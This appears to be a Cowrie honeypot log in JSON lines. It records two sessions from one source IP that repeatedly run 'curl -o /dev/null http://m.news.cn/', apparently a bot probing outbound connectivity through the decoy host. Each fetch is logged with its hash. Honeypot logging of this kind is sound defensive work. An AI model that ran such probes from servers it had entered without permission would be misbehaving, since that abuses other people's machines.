{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.727842Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.732737Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:51.735888Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.736769Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.745180Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.746724Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.769405Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:51.770966Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.771921Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.775092Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.780112Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.787525Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:51.794509Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.795431Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.800652Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.804268Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:51.809025Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.810113Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.818948Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.826013Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:51.829755Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.830627Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:51.849296Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.850002Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.855585Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.859026Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.864348Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:51.869161Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.869969Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.875576Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.889455Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:51.894643Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.895488Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.898833Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.901727Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:51.913116Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.913867Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:51.938022Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.939674Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:51.949801Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.950552Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:51.985407Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.986320Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:51.998584Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:51.999476Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.005885Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.029473Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.044530Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.045884Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.049352Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.050186Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.068981Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.075194Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.093282Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.094194Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.096141Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.097379Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.103620Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.105353Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.108339Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.112448Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.116958Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.128196Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.129083Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.131766Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.134090Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.138654Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.139559Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.142867Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.150460Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.155696Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.162636Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.165647Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:52.166344Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:52.179029Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
